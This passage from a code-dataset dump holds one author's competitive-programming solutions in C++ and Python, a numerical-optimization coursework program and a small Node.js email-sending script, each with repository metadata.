-1 : ans;\n }\n};\n" }, { "alpha_fraction": 0.42680180072784424, "alphanum_fraction": 0.44003379344940186, "avg_line_length": 30.714284896850586, "blob_id": "a84f9a16e6749d55d377adc9bedfec20fa2e3b45", "content_id": "6cbbdef5040f52a30d4e2db3e379d5b727ba7ec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3552, "license_type": "no_license", "max_line_length": 928, "num_lines": 112, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.17/K.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define ll long long\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> d;\nvector< vector< pair<int, int> > > edges;\nint a[101][101];\nint n;\nstring FILENAME = \"honeymoon\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for 
(int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint dijkstra()\n{\n priority_queue< pair<int, int> > q;\n q.push(make_pair(0, 0));\n d.clear();\n d.resize(n * n, INF);\n d[0] = 0;\n int u, curd, v, w;\n while (!q.empty())\n {\n u = q.top().second;\n curd = -q.top().first;\n q.pop();\n if (curd > d[u])\n continue;\n for (int i = 0; i < edges[u].size(); i++)\n {\n v = edges[u][i].first;\n w = edges[u][i].second;\n if (u == v)\n continue;\n if (d[v] > d[u] + w)\n {\n d[v] = d[u] + w;\n q.push(make_pair(-d[v], v));\n }\n }\n }\n return d[n * n - 1];\n}\n\nvoid run()\n{\n readln(n);\n int x;\n edges.clear();\n edges.resize(n * n);\n for (int i = 0; i < n; i++)\n for (int j = 0; j < n; j++)\n read(a[i][j]);\n for (int i = 0; i < n; i++)\n for (int j = 0; j < n; j++)\n {\n if (i > 0)\n edges[n * i + j].pb(make_pair(n * (i - 1) + j, a[i][j] - a[i - 1][j]));\n if (j > 0)\n edges[n * i + j].pb(make_pair(n * i + j - 1, a[i][j] - a[i][j - 1]));\n if (i < n - 1)\n edges[n * i + j].pb(make_pair(n * (i + 1) + j, a[i][j] - a[i + 1][j]));\n if (j < n - 1)\n edges[n * i + j].pb(make_pair(n * i + j + 1, a[i][j] - a[i][j + 1]));\n }\n printf(\"%d\", dijkstra());\n// for (int i = 0; i < n * n; i++)\n // for (int j = 0; j < edges[i].size(); j++)\n // printf(\"%d %d %d\\n\", i, edges[i][j].first, edges[i][j].second);\n writeln(d);\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n int T;\n readln(T);\n for (int TT = 0; TT < T; TT++)\n {\n printf(\"Scenario #%d:\\n\", TT + 1);\n run();\n if (TT < T - 1)\n printf(\"\\n\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.49733901023864746, "alphanum_fraction": 0.5156998634338379, "avg_line_length": 30.579832077026367, "blob_id": "1c573c2cb257472e30052051887b2d67a75ff685", "content_id": 
"0baa976acbc04dec8de5640759858119eb304be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3758, "license_type": "no_license", "max_line_length": 174, "num_lines": 119, "path": "/2021/gcjQual/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nint ask(int x, int y, int z)\n{\n writeln(x + 1, y + 1, z + 1);\n cout.flush();\n ints(ans);\n return ans - 1;\n}\n\nvoid run(int n)\n{\n vector<int> a(n);\n iota(all(a), 0);\n random_shuffle(all(a));\n function<vector<int>(int, vector<int>&, int)> f = [&](int l, vector<int>& a, int r) -> vector<int> {\n int m = SZ(a);\n if (m <= 1) return a;\n\n int x = a[0];\n int y = a[1];\n vector<int> left, middle, right;\n for (int i = 2; i < m; ++i)\n {\n int mid = ask(x, y, a[i]);\n if (mid == a[i])\n middle.pb(a[i]);\n else if (mid == x)\n left.pb(a[i]);\n else\n right.pb(a[i]);\n }\n \n if (l != -1)\n {\n int temp = ask(l, x, y);\n if (temp == y)\n swap(x, y),\n swap(left, right);\n } else if (r != -1)\n {\n int temp = ask(r, x, y);\n if (temp == x)\n swap(x, y),\n swap(left, right);\n }\n \n vector<int> L = f(l, left, x);\n vector<int> M = f(x, middle, y);\n vector<int> R = f(y, right, r);\n vector<int> b;\n for (int& z: L) b.pb(z);\n b.pb(x);\n for (int& z: M) b.pb(z);\n b.pb(y);\n for (int& z: R) b.pb(z);\n return b;\n };\n vector<int> temp = f(-1, a, -1);\n for (int& z: temp) ++z;\n writeln(temp);\n cout.flush();\n ints(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t, n, q);\n fori(t) run(n);\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return 
os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.40654826164245605, "alphanum_fraction": 0.466728538274765, "avg_line_length": 28.700786590576172, "blob_id": "48b9fc54f32d4aac656f062dcda97928700339e8", "content_id": "b7a36001e39ae1c674fcce1ea9a437a4beb5def2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7544, "license_type": "no_license", "max_line_length": 139, "num_lines": 254, "path": "/Ann/Kursach.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n#define MAXN 5\n\nusing namespace std;\nusing namespace std::placeholders;\n\nstatic const double eps = 0.0001;\nstatic const double delta = 0.00001;\nstatic const double l = 0.;\nstatic const double x10 = 0., x20 = 0.;\n\nlong long cnk[MAXN][MAXN];\n\nvoid build_cnk()\n{\n for (int i = 0; i < MAXN; i++)\n cnk[i][0] = 1ll;\n for (int i = 1; i < MAXN; i++)\n for (int j = 1; j < MAXN; j++)\n cnk[i][j] = cnk[i - 1][j] + cnk[i - 1][j - 1];\n}\n\nauto d2f(std::function<double(double, double)> f) -> decltype(f)\n{\n return [f](double x, double y)\n {\n double ans = f(x + delta, y) - f(x, y);\n double t = ans;\n int sign = -1;\n for (int i = 1; i <= MAXN; i++, sign *= -1)\n {\n double tcur = 0;\n for (int j = 0, s = 1; j <= i; j++, s *= -1)\n tcur += s * cnk[i][j] * f(x + delta * (i - j + 1), y);\n t = tcur - t;\n ans += sign * t / (i + 1);\n }\n return ans / delta;\n };\n}\n\nauto df(std::function<double(double)> f) -> decltype(f)\n{\n return bind(d2f([f](double x, double y){return f(x);}), _1, 0);\n}\n\ndouble f(double x1, double x2)\n{\n\n return ((x2 - x1 * x1) * (x2 - x1 * x1) * 100 + (x1 - 1) * (x1 - 1) * 5) / 
400;\n}\n\ndouble minimize(std::function<double(double)> f) //Newton method for minimization of one-dimensional function\n{\n\n for (double x = -df(f)(0) / df(df(f))(0); ; x -= df(f)(x) / df(df(f))(x))\n if (fabs(df(f)(x)) <= eps)\n return x;\n}\n\n\ndouble fx1(double x1, double x2)\n{\n return df(bind(f, _1, x2))(x1);\n\n}\n\ndouble fx2(double x1, double x2)\n{\n\n return df(bind(f, x1, _1))(x2);\n\n}\n\nbool check(double x1, double x2)\n{\n\n cout << x1 << \" \" << x2 << \"\\n\";\n return (fabs(fx1(x1, x2)) <= eps && fabs(fx2(x1, x2)) <= eps);\n}\n\npair<double, double> gradientDownFragmentation()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, t, f1, f2;\n while (!check(x1, x2))\n {\n countOfOperations++;\n t = f(x1, x2);\n while (true)\n {\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n x11 = x1 - alpha * f1;\n x21 = x2 - alpha * f2;\n if (f(x11, x21) > t - eps * alpha * (f1 * f1 + f2 * f2))\n alpha /= 2;\n else\n break;\n }\n x1 = x11;\n x2 = x21;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n\n return {x1, x2};\n}\n\npair<double, double> fastestGradientDown()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, f1, f2;\n auto fun = [&x1, &x2](double lambda){return f(x1 - lambda * fx1(x1, x2), x2 - lambda * fx2(x1, x2));};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n alpha = minimize(fun);\n x1 = x1 - alpha * f1;\n x2 = x2 - alpha * f2;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\npair<double, double> soprDirection()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p;\n p1 
= f1 = fx1(x1, x2);\n p2 = f2 = fx2(x1, x2);\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n alpha = minimize(fun);\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1p = f1;\n f2p = f2;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n beta = (f1 * f1 + f2 * f2) / (f1p * f1p + f2p * f2p);\n p1 = f1 + beta * p1;\n p2 = f2 + beta * p2;\n alpha = minimize(fun);\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n alpha = minimize(fun);\n }\n x2 = x2 - alpha * p2;\n x1 = x1 - alpha * p1;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\npair<double, double> Gradppor()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p, a = 1., b = 0., c = 0., d = 1., q, w, e, r, t, y, u, s, v, h, g, y1, y2;\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n p1 = a * f1 + b * f2;\n p2 = c * f1 + d * f2;\n alpha = minimize(fun);\n\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n a=1;b=0;c=0;d=1;\n alpha = minimize(fun);\n }\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n y1 = fx1(x1, x2) - f1;\n y2 = fx2(x1, x2) - f2;\n q = a * y1 + b * y2;\n w = c * y1 + d * y2;\n u = q * y1 + w * y2;\n e = (q * y1 * a + q * y2 * c) / u;\n r = (q * y1 * b + q * y2 * d) / u;\n t = (w * y1 * a + w * y2 * c) / u;\n y = (w * y1 * b + w * y2 * d) / u;\n u = (p1 * y1 + p2 * y2);\n s = (p1 * p1 * a + p1 * p2 * b) * alpha / u;\n v = (p1 * p1 * c + p1 * p2 * d) * alpha / u;\n h = (p1 * p2 * a + p2 * p2 * b) * alpha / u;\n g = (p1 * p2 * c + p2 * p2 * d) * alpha / u;\n a = a - e + s;\n b = b - r + 
v;\n c = c - t + h;\n d = d - y + g;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\npair<double, double> newton()\n{\n double x1 = x10, x2 = x20;\n int countOfOperations = 0;\n double start = clock(), f1, f2, x11, x21;\n double q11, q12, q22;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n q11 = df(df(bind(f, _1, x2)))(x1);\n q12 = df(bind(d2f(f), x1, _1))(x2);\n q22 = df(df(bind(f, x1, _1)))(x2);\n x1 = x1 - (f1 * q22 - f2 * q12) / (q11 * q22 - q12 * q12);\n x2 = x2 - (-f1 * q12 + f2 * q11) / (q11 * q22 - q12 * q12);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl << \"qwe\";\n return {x1, x2};\n}\n\nint main()\n{\n pair<double, double> temp;\n cout.precision(10);\n build_cnk();\n freopen(\"output.txt\", \"w\", stdout);\n cout << \"gradient down with fragmentation:\\n\" << (temp = gradientDownFragmentation()).first << \" \";cout << temp.second << endl << endl;\n cout << \"fastest gradient down:\\n\" << (temp = fastestGradientDown()).first << \" \";cout << temp.second << endl << endl;\n// cout << \"sopr direction(Fletchera-Rivsa):\\n\" << (temp = soprDirection()).first << \" \";cout << temp.second << endl << endl;\n// cout << \"newton:\\n\" << (temp = newton()).first << \" \" << temp.second << endl << endl;\n// cout << \"gradient p poryadka:\\n\" << (temp = Gradppor()).first << \" \";cout << temp.second << endl << endl;\n fclose(stdout);\n system(\"javac *.java\");\n system(\"java MainFrame &\");\n return 0;\n}\n" }, { "alpha_fraction": 0.46524062752723694, "alphanum_fraction": 0.48128342628479004, "avg_line_length": 14.5, "blob_id": "98ebc0109fc87864556bad67f84a8e547d7bc9dc", "content_id": "8f281f3f827c20eaaeb2d875f47d261c7f7e5861", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 187, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/CodeForce/0952/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nn = int(input())\na = list(map(int, input().split()))\nok = True\n\nfor i in range(n - 1):\n if abs(a[i] - a[i + 1]) > 1:\n ok = False\n\nif ok:\n print('YES')\nelse:\n print('NO')\n" }, { "alpha_fraction": 0.5644268989562988, "alphanum_fraction": 0.5707510113716125, "avg_line_length": 23.326923370361328, "blob_id": "9e51e29e744ff1340d9d684a4c585a4fdeeb4670", "content_id": "82c4cefe80c68a6e1f612f81f70c42a50a0c34c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1265, "license_type": "no_license", "max_line_length": 84, "num_lines": 52, "path": "/scripts/mailSender/index.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "const nodemailer = require('nodemailer');\nconst smtpTransport = require('nodemailer-smtp-transport');\nconst config = require('./config.json');\nconst transporter = nodemailer.createTransport(smtpTransport(config.emailSettings));\nconst process = require('process');\nconst args = process.argv.slice(2);\n\n//Config contains:\n//{\n //\"emailSettings\": {\n //\"domains\": [\n //\"yandex.ru\"\n //],\n //\"host\": \"smtp.yandex.ru\",\n //\"secureConnection\": true,\n //\"port\": 465,\n //\"auth\": {\n //\"user\": \"[email protected]\",\n //\"pass\": \"pAsSwOrD\"\n //}\n //}\n//} \n\nlet sendEmail = async (to, header, html) => {\n console.log(`Sending mail to ${to}:\\n${header}`);\n if (!to)\n return;\n\n let mailOptions = {\n from: '\"Зайка Познайка\" <[email protected]>',\n to: to,\n subject: header,\n html: html\n };\n\n await transporter.sendMail(mailOptions, (error, info) => {\n if (error) {\n console.error(error);\n } else\n console.log(info);\n });\n console.log(`email to ${to} is successfully sent`);\n}\n\nif (args.length < 2)\n console.error('Not enough 
arguments\\nUsage: node index.js [email protected] theme text');\nelse\n sendEmail(args[0], args[1], args[2] || '');\n\nmodule.exports = {\n sendEmail: sendEmail\n};\n" }, { "alpha_fraction": 0.3685567080974579, "alphanum_fraction": 0.39175257086753845, "avg_line_length": 21.171428680419922, "blob_id": "8ed2c9ecf6a6519217a1789e8a4598859864c7b1", "content_id": "489aa2d6f5ddfc93594b99931803f2804327f36a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 71, "num_lines": 70, "path": "/2015/Ya1/Bcor.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cmath>\n#include <algorithm>\n\nusing namespace std;\n\nstruct Point {\n int x, y, a;\n\n Point() {}\n \n Point(int _x, int _y): x(_x), y(_y), a(-1) {}\n\n Point operator-(const Point &p) const {\n return Point(x - p.x, y - p.y);\n }\n};\n\nconst int MAXN = 1005;\nPoint p[MAXN], q[2 * MAXN];\n\nint cp(const Point &a, const Point &b) {\n return a.x * b.y - a.y * b.x;\n}\n\nbool operator<(const Point &a, const Point &b) {\n if(a.x < 0 || (a.x == 0 && a.y < 0)) {\n if(b.x < 0 || (b.x == 0 && b.y < 0))\n return cp(a, b) > 0;\n return true;\n }\n if(b.x < 0 || (b.x == 0 && b.y < 0))\n return false;\n return cp(a, b) > 0;\n}\n\nbool cmp(const Point &a, const Point &b) {\n return a - q[0] < b - q[0];\n}\n\nint main() {\n ios_base::sync_with_stdio(false);\n int n;\n cin >> n;\n int sum = 0;\n for(int i = 0; i < n; i++) {\n cin >> p[i].x >> p[i].y >> p[i].a;\n sum += p[i].a;\n }\n int ans = sum;\n for(int i = 0; i < n; i++) {\n for(int j = 0; j < n; j++)\n q[j] = p[j];\n swap(q[i], q[0]);\n sort(q + 1, q + n, cmp);\n for(int j = 1; j < n; j++)\n q[n - 1 + j] = q[j];\n int cur = 0;\n for(int j = 1, k = 1; j < n; j++) {\n while(k < j + n - 1 && cp(q[j] - q[0], q[k] - q[0]) >= 0) {\n cur += q[k].a;\n k++;\n }\n ans = min(ans, int(abs(sum - 2 * cur)));\n cur -= q[j].a;\n }\n }\n 
cout << ans << '\\n';\n return 0;\n}\n" }, { "alpha_fraction": 0.37037035822868347, "alphanum_fraction": 0.39961013197898865, "avg_line_length": 17.321428298950195, "blob_id": "b8ff8efada6b7a13827a7d010808cdfeaf88a601", "content_id": "55bbbcecbcbb280fca53994b454c8a28564f7e47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 513, "license_type": "no_license", "max_line_length": 50, "num_lines": 28, "path": "/TopCoder/2017-TCO-Algorithm/350/ParenthesisRemoval.cc", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\n\n\nclass ParenthesisRemoval \n{\npublic:\n int MOD = 1000000007;\n int countWays(string s) \n {\n int n = s.size();\n int ans = 1;\n int b = 0;\n fori(n)\n {\n if (s[i] == '(')\n b++;\n else\n ans = (ans * 1ll * b) % MOD,\n --b;\n }\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.5268212556838989, "alphanum_fraction": 0.5425158143043518, "avg_line_length": 33.70731735229492, "blob_id": "9623fc9f985d7a87a07632861b6710c0d390041f", "content_id": "3729e3875373d4b286de9012d47dc061cf564543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 162, "num_lines": 123, "path": "/CodeForce/1209/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma GCC optimize(\"Ofast\")\n#pragma GCC target(\"avx,avx2,fma\")\n#pragma GCC optimize(\"unroll-loops\")\n// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, m);\n vector<vector<int>> c(n, vi(n + n + 1));\n int s = 0;\n int cnt = min(n, m);\n {\n vector<vector<int>> a(n, vi(m));\n readln(a);\n vector<pii> columns;\n forj(m)\n {\n int s = 0;\n fori(n)\n s = max(s, a[i][j]);\n columns.pb({s, j});\n }\n sort(columns.rbegin(), columns.rend());\n forj(cnt)\n fori(n)\n c[j][i] = c[j][i + n] = a[i][columns[j].second];\n fori(n) s += c[0][i];\n }\n\n function<int(vector<int>&, int, int)> get = [&](vector<int>& state, int sum, int index) {\n if (index == cnt) return sum;\n int mx = sum;\n fori(n)\n {\n vector<int> diff(n, 0);\n int curSum = sum;\n forj(n)\n if (int curIndex = i + j, elem = c[index][curIndex]; state[j] < elem)\n {\n diff[j] = elem - state[j];\n state[j] += diff[j];\n curSum += diff[j];\n }\n if (curSum > sum)\n mx = max(mx, get(state, curSum, index + 1));\n forj(n)\n state[j] -= diff[j];\n }\n return mx;\n };\n\n writeln(get(c[0], s, 1));\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n run();\n cerr << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>const&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n 
\"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4806995093822479, "alphanum_fraction": 0.5015994906425476, "avg_line_length": 31.5625, "blob_id": "839ab6bff054254ab4069dba2c4551d7dfc91685", "content_id": "6bd1ca3a32efb3a45b86e070c6ab833d44050ea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4689, "license_type": "no_license", "max_line_length": 174, "num_lines": 144, "path": "/CodeForce/1833/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<set<pii>> g(n);\n fori(n - 1)\n {\n ints(u, v); --u; --v;\n g[u].insert({v, i});\n g[v].insert({u, i});\n }\n if (n % 3 != 0)\n return writeln(-1);\n set<int> ans;\n vector d(n, MOD);\n vector up(n, pair(-1, -1));\n d[0] = 0;\n auto dfs = [&](auto dfs, int u, int p) -> void {\n for (const auto& [v, _]: g[u])\n if (v != p)\n d[v] = d[u] + 1,\n up[v] = {u, _},\n dfs(dfs, v, u);\n };\n dfs(dfs, 0, -1);\n set<pii> order;\n fori(n)\n order.insert({-d[i], i});\n\n auto eraseVertex = [&](int u) {\n //writeln(\"ERASE VERTEX\", u + 1); cout.flush();\n order.erase({-d[u], u});\n };\n\n auto eraseEdge = [&](int u, int v, int e) {\n //writeln(\"ERASE EDGE\", u + 1, v + 1); cout.flush();\n ans.insert(e + 1);\n g[u].erase({v, e});\n g[v].erase({u, e});\n //writeln(\"ERASED EDGE\", u + 1, v + 1); cout.flush();\n 